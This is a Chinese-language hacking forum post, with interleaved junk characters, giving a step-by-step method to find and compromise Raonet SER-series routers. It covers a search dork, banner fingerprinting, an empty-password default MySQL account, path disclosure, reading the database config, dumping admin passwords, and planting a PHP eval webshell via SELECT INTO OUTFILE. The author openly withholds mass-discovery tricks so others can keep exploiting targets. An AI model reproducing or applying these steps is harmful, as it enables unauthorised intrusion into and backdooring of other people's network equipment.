寻找存在漏洞的路由器方法:
- a* Z/ c+ m* I, K1 f. r( I9 H( ?. ?( \8 @
1:google搜索'Raonet Subscriber Ethernet Router'
% ]/ n6 k! W: N6 ~
" @9 F' _: d7 C) w( P1 @2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001 W8 K8 g6 I) p
0 m8 `2 B2 c) L d$ P3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
7 z0 o' [. `- [$ p: }! b/ m- O$ `! k: F
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
7 p2 \" a* m" ?+ k- X( p
8 f) {& c2 }' p; M4 Y/ O # k0 r1 k8 Q/ r- E! ^" B ^
( \: k+ D2 x" i入侵步骤:0 d. q. Q- M$ J5 F6 e3 C& u" I
8 b. n1 p1 f5 s9 z- L! ~
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php& z9 v/ C8 e. g& K8 M/ Q
- }4 q9 o5 F2 a! x1 P; Z
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc+ b& `3 f8 Q5 L! Q3 C6 o
3:得到密码后连接,查看GUI管理密码:
3 M; x6 _2 v5 duse ser_500
3 c' U; d, f& }* a0 \* o( wselect id,passwd from user; {% K& l/ j" H$ I
4:通过数据库写入webshell,执行命令:* Q" r$ s. l' e5 _, t. ?) K6 v
use mysql;+ x" X6 i$ x0 k: [! \
create table ok(cmd TEXT);
7 F+ y) T ?( tinsert into ok values("<?php @eval($_POST[cmd])?>");
7 H. e; w' p0 S+ K, @9 M! _# Pselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";& k8 u* `: K4 T9 ~" N
drop table ok;3 D3 U. R$ P; R% K# @; I
: n1 ?& v+ l6 s/ W* h0 c; _5:连接后门shell.php
% q4 v+ l) o& l9 |. L7 T2 |
! _4 D; _6 ?6 b. o9 ~6. 搞定!
5 B' B) X9 U* d6 K9 t" i4 h' I4 W) K
|